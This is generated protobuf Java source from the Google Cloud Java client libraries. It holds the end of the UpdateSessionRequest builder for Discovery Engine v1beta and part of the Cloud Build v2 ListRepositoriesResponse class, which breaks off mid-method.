          .ensureFieldAccessorsInitialized(
              com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.class,
              com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.Builder.class);
    }

    // Construct using com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.newBuilder()
    private Builder() {
      maybeForceBuilderInitialization();
    }

    private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
      super(parent);
      maybeForceBuilderInitialization();
    }

    private void maybeForceBuilderInitialization() {
      if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {
        getSessionFieldBuilder();
        getUpdateMaskFieldBuilder();
      }
    }

    @java.lang.Override
    public Builder clear() {
      super.clear();
      bitField0_ = 0;
      session_ = null;
      if (sessionBuilder_ != null) {
        sessionBuilder_.dispose();
        sessionBuilder_ = null;
      }
      updateMask_ = null;
      if (updateMaskBuilder_ != null) {
        updateMaskBuilder_.dispose();
        updateMaskBuilder_ = null;
      }
      return this;
    }

    @java.lang.Override
    public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() {
      return com.google.cloud.discoveryengine.v1beta.ConversationalSearchServiceProto
          .internal_static_google_cloud_discoveryengine_v1beta_UpdateSessionRequest_descriptor;
    }

    @java.lang.Override
    public com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest
        getDefaultInstanceForType() {
      return com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.getDefaultInstance();
    }

    @java.lang.Override
    public com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest build() {
      com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest result = buildPartial();
      if (!result.isInitialized()) {
        throw newUninitializedMessageException(result);
      }
      return result;
    }

    @java.lang.Override
    public com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest buildPartial() {
      com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest result =
          new com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest(this);
      if (bitField0_ != 0) {
        buildPartial0(result);
      }
      onBuilt();
      return result;
    }

    // Copies set fields (per bitField0_) from this builder into the result message.
    private void buildPartial0(
        com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest result) {
      int from_bitField0_ = bitField0_;
      int to_bitField0_ = 0;
      if (((from_bitField0_ & 0x00000001) != 0)) {
        result.session_ = sessionBuilder_ == null ? session_ : sessionBuilder_.build();
        to_bitField0_ |= 0x00000001;
      }
      if (((from_bitField0_ & 0x00000002) != 0)) {
        result.updateMask_ =
            updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build();
        to_bitField0_ |= 0x00000002;
      }
      result.bitField0_ |= to_bitField0_;
    }

    @java.lang.Override
    public Builder clone() {
      return super.clone();
    }

    @java.lang.Override
    public Builder setField(
        com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) {
      return super.setField(field, value);
    }

    @java.lang.Override
    public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) {
      return super.clearField(field);
    }

    @java.lang.Override
    public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) {
      return super.clearOneof(oneof);
    }

    @java.lang.Override
    public Builder setRepeatedField(
        com.google.protobuf.Descriptors.FieldDescriptor field,
        int index,
        java.lang.Object value) {
      return super.setRepeatedField(field, index, value);
    }

    @java.lang.Override
    public Builder addRepeatedField(
        com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) {
      return super.addRepeatedField(field, value);
    }

    @java.lang.Override
    public Builder mergeFrom(com.google.protobuf.Message other) {
      if (other instanceof com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest) {
        return mergeFrom((com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest) other);
      } else {
        super.mergeFrom(other);
        return this;
      }
    }

    public Builder mergeFrom(
        com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest other) {
      if (other
          == com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest.getDefaultInstance())
        return this;
      if (other.hasSession()) {
        mergeSession(other.getSession());
      }
      if (other.hasUpdateMask()) {
        mergeUpdateMask(other.getUpdateMask());
      }
      this.mergeUnknownFields(other.getUnknownFields());
      onChanged();
      return this;
    }

    @java.lang.Override
    public final boolean isInitialized() {
      return true;
    }

    @java.lang.Override
    public Builder mergeFrom(
        com.google.protobuf.CodedInputStream input,
        com.google.protobuf.ExtensionRegistryLite extensionRegistry)
        throws java.io.IOException {
      if (extensionRegistry ==
null) {
        throw new java.lang.NullPointerException();
      }
      try {
        boolean done = false;
        while (!done) {
          // Wire-format loop: tag 10 = session (field 1, length-delimited),
          // tag 18 = update_mask (field 2, length-delimited).
          int tag = input.readTag();
          switch (tag) {
            case 0:
              done = true;
              break;
            case 10:
              {
                input.readMessage(getSessionFieldBuilder().getBuilder(), extensionRegistry);
                bitField0_ |= 0x00000001;
                break;
              } // case 10
            case 18:
              {
                input.readMessage(getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry);
                bitField0_ |= 0x00000002;
                break;
              } // case 18
            default:
              {
                if (!super.parseUnknownField(input, extensionRegistry, tag)) {
                  done = true; // was an endgroup tag
                }
                break;
              } // default:
          } // switch (tag)
        } // while (!done)
      } catch (com.google.protobuf.InvalidProtocolBufferException e) {
        throw e.unwrapIOException();
      } finally {
        onChanged();
      } // finally
      return this;
    }

    private int bitField0_;

    private com.google.cloud.discoveryengine.v1beta.Session session_;
    private com.google.protobuf.SingleFieldBuilderV3<
            com.google.cloud.discoveryengine.v1beta.Session,
            com.google.cloud.discoveryengine.v1beta.Session.Builder,
            com.google.cloud.discoveryengine.v1beta.SessionOrBuilder>
        sessionBuilder_;

    /**
     *
     *
     * <pre>
     * Required. The Session to update.
     * </pre>
     *
     * <code>
     * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED];
     * </code>
     *
     * @return Whether the session field is set.
     */
    public boolean hasSession() {
      return ((bitField0_ & 0x00000001) != 0);
    }

    /**
     *
     *
     * <pre>
     * Required. The Session to update.
     * </pre>
     *
     * <code>
     * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED];
     * </code>
     *
     * @return The session.
     */
    public com.google.cloud.discoveryengine.v1beta.Session getSession() {
      if (sessionBuilder_ == null) {
        return session_ == null
            ? com.google.cloud.discoveryengine.v1beta.Session.getDefaultInstance()
            : session_;
      } else {
        return sessionBuilder_.getMessage();
      }
    }

    /**
     *
     *
     * <pre>
     * Required. The Session to update.
     * </pre>
     *
     * <code>
     * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED];
     * </code>
     */
    public Builder setSession(com.google.cloud.discoveryengine.v1beta.Session value) {
      if (sessionBuilder_ == null) {
        if (value == null) {
          throw new NullPointerException();
        }
        session_ = value;
      } else {
        sessionBuilder_.setMessage(value);
      }
      bitField0_ |= 0x00000001;
      onChanged();
      return this;
    }

    /**
     *
     *
     * <pre>
     * Required. The Session to update.
     * </pre>
     *
     * <code>
     * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED];
     * </code>
     */
    public Builder setSession(
        com.google.cloud.discoveryengine.v1beta.Session.Builder builderForValue) {
      if (sessionBuilder_ == null) {
        session_ = builderForValue.build();
      } else {
        sessionBuilder_.setMessage(builderForValue.build());
      }
      bitField0_ |= 0x00000001;
      onChanged();
      return this;
    }

    /**
     *
     *
     * <pre>
     * Required. The Session to update.
     * </pre>
     *
     * <code>
     * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED];
     * </code>
     */
    public Builder mergeSession(com.google.cloud.discoveryengine.v1beta.Session value) {
      if (sessionBuilder_ == null) {
        if (((bitField0_ & 0x00000001) != 0)
            && session_ != null
            && session_ != com.google.cloud.discoveryengine.v1beta.Session.getDefaultInstance()) {
          getSessionBuilder().mergeFrom(value);
        } else {
          session_ = value;
        }
      } else {
        sessionBuilder_.mergeFrom(value);
      }
      if (session_ != null) {
        bitField0_ |= 0x00000001;
        onChanged();
      }
      return this;
    }

    /**
     *
     *
     * <pre>
     * Required. The Session to update.
     * </pre>
     *
     * <code>
     * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED];
     * </code>
     */
    public Builder clearSession() {
      bitField0_ = (bitField0_ & ~0x00000001);
      session_ = null;
      if (sessionBuilder_ != null) {
        sessionBuilder_.dispose();
        sessionBuilder_ = null;
      }
      onChanged();
      return this;
    }

    /**
     *
     *
     * <pre>
     * Required. The Session to update.
* </pre>
     *
     * <code>
     * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED];
     * </code>
     */
    public com.google.cloud.discoveryengine.v1beta.Session.Builder getSessionBuilder() {
      bitField0_ |= 0x00000001;
      onChanged();
      return getSessionFieldBuilder().getBuilder();
    }

    /**
     *
     *
     * <pre>
     * Required. The Session to update.
     * </pre>
     *
     * <code>
     * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED];
     * </code>
     */
    public com.google.cloud.discoveryengine.v1beta.SessionOrBuilder getSessionOrBuilder() {
      if (sessionBuilder_ != null) {
        return sessionBuilder_.getMessageOrBuilder();
      } else {
        return session_ == null
            ? com.google.cloud.discoveryengine.v1beta.Session.getDefaultInstance()
            : session_;
      }
    }

    /**
     *
     *
     * <pre>
     * Required. The Session to update.
     * </pre>
     *
     * <code>
     * .google.cloud.discoveryengine.v1beta.Session session = 1 [(.google.api.field_behavior) = REQUIRED];
     * </code>
     */
    private com.google.protobuf.SingleFieldBuilderV3<
            com.google.cloud.discoveryengine.v1beta.Session,
            com.google.cloud.discoveryengine.v1beta.Session.Builder,
            com.google.cloud.discoveryengine.v1beta.SessionOrBuilder>
        getSessionFieldBuilder() {
      if (sessionBuilder_ == null) {
        sessionBuilder_ =
            new com.google.protobuf.SingleFieldBuilderV3<
                com.google.cloud.discoveryengine.v1beta.Session,
                com.google.cloud.discoveryengine.v1beta.Session.Builder,
                com.google.cloud.discoveryengine.v1beta.SessionOrBuilder>(
                getSession(), getParentForChildren(), isClean());
        session_ = null;
      }
      return sessionBuilder_;
    }

    private com.google.protobuf.FieldMask updateMask_;
    private com.google.protobuf.SingleFieldBuilderV3<
            com.google.protobuf.FieldMask,
            com.google.protobuf.FieldMask.Builder,
            com.google.protobuf.FieldMaskOrBuilder>
        updateMaskBuilder_;

    /**
     *
     *
     * <pre>
     * Indicates which fields in the provided
     * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The
     * following are NOT supported:
     *
     * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name]
     *
     * If not set or empty, all supported fields are updated.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     *
     * @return Whether the updateMask field is set.
     */
    public boolean hasUpdateMask() {
      return ((bitField0_ & 0x00000002) != 0);
    }

    /**
     *
     *
     * <pre>
     * Indicates which fields in the provided
     * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The
     * following are NOT supported:
     *
     * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name]
     *
     * If not set or empty, all supported fields are updated.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     *
     * @return The updateMask.
     */
    public com.google.protobuf.FieldMask getUpdateMask() {
      if (updateMaskBuilder_ == null) {
        return updateMask_ == null
            ? com.google.protobuf.FieldMask.getDefaultInstance()
            : updateMask_;
      } else {
        return updateMaskBuilder_.getMessage();
      }
    }

    /**
     *
     *
     * <pre>
     * Indicates which fields in the provided
     * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The
     * following are NOT supported:
     *
     * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name]
     *
     * If not set or empty, all supported fields are updated.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public Builder setUpdateMask(com.google.protobuf.FieldMask value) {
      if (updateMaskBuilder_ == null) {
        if (value == null) {
          throw new NullPointerException();
        }
        updateMask_ = value;
      } else {
        updateMaskBuilder_.setMessage(value);
      }
      bitField0_ |= 0x00000002;
      onChanged();
      return this;
    }

    /**
     *
     *
     * <pre>
     * Indicates which fields in the provided
     * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The
     * following are NOT supported:
     *
     * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name]
     *
     * If not set or empty, all supported fields are updated.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public Builder setUpdateMask(com.google.protobuf.FieldMask.Builder builderForValue) {
      if (updateMaskBuilder_ == null) {
        updateMask_ = builderForValue.build();
      } else {
        updateMaskBuilder_.setMessage(builderForValue.build());
      }
      bitField0_ |= 0x00000002;
      onChanged();
      return this;
    }

    /**
     *
     *
     * <pre>
     * Indicates which fields in the provided
     * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The
     * following are NOT supported:
     *
     * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name]
     *
     * If not set or empty, all supported fields are updated.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) {
      if (updateMaskBuilder_ == null) {
        if (((bitField0_ & 0x00000002) != 0)
            && updateMask_ != null
            && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) {
          getUpdateMaskBuilder().mergeFrom(value);
        } else {
          updateMask_ = value;
        }
      } else {
        updateMaskBuilder_.mergeFrom(value);
      }
      if (updateMask_ != null) {
        bitField0_ |= 0x00000002;
        onChanged();
      }
      return this;
    }

    /**
     *
     *
     * <pre>
     * Indicates which fields in the provided
     * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The
     * following are NOT supported:
     *
     * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name]
     *
     * If not set or empty, all supported fields are updated.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public Builder clearUpdateMask() {
      bitField0_ = (bitField0_ & ~0x00000002);
      updateMask_ = null;
      if (updateMaskBuilder_ != null) {
        updateMaskBuilder_.dispose();
        updateMaskBuilder_ = null;
      }
      onChanged();
      return this;
    }

    /**
     *
     *
     * <pre>
     * Indicates which fields in the provided
     * [Session][google.cloud.discoveryengine.v1beta.Session] to update.
The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000002; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * * * <pre> * Indicates which fields in the provided * [Session][google.cloud.discoveryengine.v1beta.Session] to update. The * following are NOT supported: * * * [Session.name][google.cloud.discoveryengine.v1beta.Session.name] * * If not set or empty, all supported fields are updated. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.discoveryengine.v1beta.UpdateSessionRequest) } // @@protoc_insertion_point(class_scope:google.cloud.discoveryengine.v1beta.UpdateSessionRequest) private static final com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest(); } public static com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<UpdateSessionRequest> PARSER = new com.google.protobuf.AbstractParser<UpdateSessionRequest>() { @java.lang.Override public UpdateSessionRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw 
e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<UpdateSessionRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<UpdateSessionRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.discoveryengine.v1beta.UpdateSessionRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,817
java-cloudbuild/proto-google-cloud-build-v2/src/main/java/com/google/cloudbuild/v2/ListRepositoriesResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/devtools/cloudbuild/v2/repositories.proto // Protobuf Java Version: 3.25.8 package com.google.cloudbuild.v2; /** * * * <pre> * Message for response to listing Repositories. * </pre> * * Protobuf type {@code google.devtools.cloudbuild.v2.ListRepositoriesResponse} */ public final class ListRepositoriesResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.devtools.cloudbuild.v2.ListRepositoriesResponse) ListRepositoriesResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ListRepositoriesResponse.newBuilder() to construct. 
private ListRepositoriesResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListRepositoriesResponse() { repositories_ = java.util.Collections.emptyList(); nextPageToken_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListRepositoriesResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloudbuild.v2.RepositoryManagerProto .internal_static_google_devtools_cloudbuild_v2_ListRepositoriesResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloudbuild.v2.RepositoryManagerProto .internal_static_google_devtools_cloudbuild_v2_ListRepositoriesResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloudbuild.v2.ListRepositoriesResponse.class, com.google.cloudbuild.v2.ListRepositoriesResponse.Builder.class); } public static final int REPOSITORIES_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloudbuild.v2.Repository> repositories_; /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ @java.lang.Override public java.util.List<com.google.cloudbuild.v2.Repository> getRepositoriesList() { return repositories_; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ @java.lang.Override public java.util.List<? extends com.google.cloudbuild.v2.RepositoryOrBuilder> getRepositoriesOrBuilderList() { return repositories_; } /** * * * <pre> * The list of Repositories. 
* </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ @java.lang.Override public int getRepositoriesCount() { return repositories_.size(); } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ @java.lang.Override public com.google.cloudbuild.v2.Repository getRepositories(int index) { return repositories_.get(index); } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ @java.lang.Override public com.google.cloudbuild.v2.RepositoryOrBuilder getRepositoriesOrBuilder(int index) { return repositories_.get(index); } public static final int NEXT_PAGE_TOKEN_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object nextPageToken_ = ""; /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ @java.lang.Override public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } } /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. 
*/ @java.lang.Override public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < repositories_.size(); i++) { output.writeMessage(1, repositories_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, nextPageToken_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < repositories_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, repositories_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, nextPageToken_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloudbuild.v2.ListRepositoriesResponse)) { return super.equals(obj); } com.google.cloudbuild.v2.ListRepositoriesResponse other = (com.google.cloudbuild.v2.ListRepositoriesResponse) obj; if (!getRepositoriesList().equals(other.getRepositoriesList())) return false; if (!getNextPageToken().equals(other.getNextPageToken())) return 
false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getRepositoriesCount() > 0) { hash = (37 * hash) + REPOSITORIES_FIELD_NUMBER; hash = (53 * hash) + getRepositoriesList().hashCode(); } hash = (37 * hash) + NEXT_PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getNextPageToken().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public 
static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloudbuild.v2.ListRepositoriesResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? 
new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Message for response to listing Repositories. * </pre> * * Protobuf type {@code google.devtools.cloudbuild.v2.ListRepositoriesResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.devtools.cloudbuild.v2.ListRepositoriesResponse) com.google.cloudbuild.v2.ListRepositoriesResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloudbuild.v2.RepositoryManagerProto .internal_static_google_devtools_cloudbuild_v2_ListRepositoriesResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloudbuild.v2.RepositoryManagerProto .internal_static_google_devtools_cloudbuild_v2_ListRepositoriesResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloudbuild.v2.ListRepositoriesResponse.class, com.google.cloudbuild.v2.ListRepositoriesResponse.Builder.class); } // Construct using com.google.cloudbuild.v2.ListRepositoriesResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (repositoriesBuilder_ == null) { repositories_ = java.util.Collections.emptyList(); } else { repositories_ = null; repositoriesBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); nextPageToken_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloudbuild.v2.RepositoryManagerProto 
.internal_static_google_devtools_cloudbuild_v2_ListRepositoriesResponse_descriptor; } @java.lang.Override public com.google.cloudbuild.v2.ListRepositoriesResponse getDefaultInstanceForType() { return com.google.cloudbuild.v2.ListRepositoriesResponse.getDefaultInstance(); } @java.lang.Override public com.google.cloudbuild.v2.ListRepositoriesResponse build() { com.google.cloudbuild.v2.ListRepositoriesResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloudbuild.v2.ListRepositoriesResponse buildPartial() { com.google.cloudbuild.v2.ListRepositoriesResponse result = new com.google.cloudbuild.v2.ListRepositoriesResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloudbuild.v2.ListRepositoriesResponse result) { if (repositoriesBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { repositories_ = java.util.Collections.unmodifiableList(repositories_); bitField0_ = (bitField0_ & ~0x00000001); } 